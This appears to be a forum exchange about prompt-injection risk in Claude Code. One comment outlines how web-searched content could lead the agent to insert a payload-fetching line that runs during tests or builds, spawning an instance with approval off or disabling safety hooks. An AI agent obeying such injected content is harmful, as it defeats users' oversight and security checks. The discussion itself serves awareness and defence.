If you are only glancing over it and not doing a detailed review I think you could get hit with a prompt injection in the way I mentioned, with it writing something into the code that then when you run tests or the app ends up doing the action, which could be spinning up another claude code instance with approval off or turning off safety hooks etc.

The prompt injection would come from where? If I am chatting with the llm and directly copy paste where is the injection. It would have to ge a malicious llm response but that is much much less likely than when you scrape third party sites or documents

The prompt injection would come when Claude code searches the web. What it then slips in the code would get there when you approve the edit without carefully looking at it, it can be in one line that fetches a payload somewhere else. The execution would come when you run the program you are building or its unit tests or even when you do a build if it is slipped into a make file.